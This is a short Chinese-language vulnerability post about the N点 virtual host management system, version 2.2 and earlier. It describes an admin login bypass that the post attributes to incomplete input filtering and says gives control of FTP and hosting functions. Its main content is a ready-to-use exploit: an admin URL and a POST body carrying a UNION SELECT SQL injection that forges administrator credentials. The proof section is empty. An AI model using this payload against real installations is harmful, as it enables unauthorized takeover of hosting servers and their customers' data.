释放双眼,带上耳机,听听看~!
N点虚拟主机管理系统是针对销售主机、邮局、数据库等产品时效率低、管理难等问题而自主研发的集产品自动化开通、管理、续费、升级等功能为一体的软件系统后台登陆权限绕过,可以操纵FTP、建立虚拟主机,操作其他的ftp服务器等等。漏洞版本:最新的个人版本(2.2版本及以前的版本)漏洞
N点虚拟主机管理系统是针对销售 主机、邮局、数据库等产品时效率低、管理难等问题而自主研发的集产品自动化开通、管理、续费、升级等功能为一体的软件系统
后台登陆权限绕过,可以操纵FTP、建立虚拟主机,操作其他的ftp服务器等等。
漏洞版本:最新的个人版本(2.2版本及以前的版本)
漏洞原因:过滤不完全所致
漏洞EXP:
http://www.xxx.com//admin/index.asp?logohost=npointhostpost内容:
user=admin'%20and%0a1=2%0aunion%0aselect%0aid,mid("admin'%16",1,8),mid('4C877D2C89DC086EDE74EB682B5973',1,30),cs,lip,ldate%0afrom%0aadminlogo%16&password=123&cord=fz9a&button=漏洞证明:
